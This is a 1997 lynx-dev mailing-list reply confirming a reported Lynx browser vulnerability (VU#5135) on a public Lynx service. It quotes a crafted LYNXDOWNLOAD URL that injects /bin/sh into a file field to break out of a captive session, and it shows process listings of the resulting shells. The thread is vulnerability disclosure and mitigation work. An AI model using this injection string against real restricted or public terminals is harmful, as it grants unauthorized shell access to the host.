[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
From: |
H E Nelson |
Subject: |
Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd) |
Date: |
Tue, 24 Jun 1997 23:09:10 +0900 (JST) |
> subscribed to the raven list :) So, here it is in case nobody's seen
> it yet.
>
> Duncan Hill
Good work, Duncan!
> When you start up a lynx client session, you can hit "g" (for Goto) and
> then enter the following URL:
>
> URL to open:
> LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
> Enter a filename: /dev/null
> File exists. Overwrite? (y/n) y
>
> This then gives a shell on the client machine on which the lynx process is
> executing.
On my pubLynx, it does appear that a shell was created. Not only that, I
found that by using certain control keys (the terminal was initially locked
to regular keys), I could create any number of shells after that. Who
knows how it could be exploited.
# ps -aux | grep lynx | grep -v grep
lynx 2493 0.0 3.3 3508 2868 pts/0 S 22:33:26 0:00 /usr/local/bin/lyn
lynx 2498 0.0 0.8 844 644 pts/0 S 22:34:51 0:00 sh -c /usr/bin/cp
lynx 2500 0.0 1.0 1168 856 pts/0 S 22:34:52 0:00 /bin/sh
lynx 2545 0.0 1.2 1300 972 pts/0 S 22:56:00 0:00 /bin/csh
> We would be interested in knowing whether this is a known problem. The
> reporter suggested that disabling downloads would be an appropriate
> workaround. If you are in agreement with this, is this a feature that is
> enabled by default? (This would require the captive session to be started
> using the "-restrictions=download" option, wouldn't it?)
The "-restrictions=download" command line switch did not seem to prevent
someone from getting a shell on my setup. I'll do more experimenting on
a machine not connected to the Net.
Needless to say, pubLynx is down until this problem is solved. Sorry, folks.
__Henry
;
; To UNSUBSCRIBE: Send a mail message to address@hidden
; with "unsubscribe lynx-dev" (without the
; quotation marks) on a line by itself.
;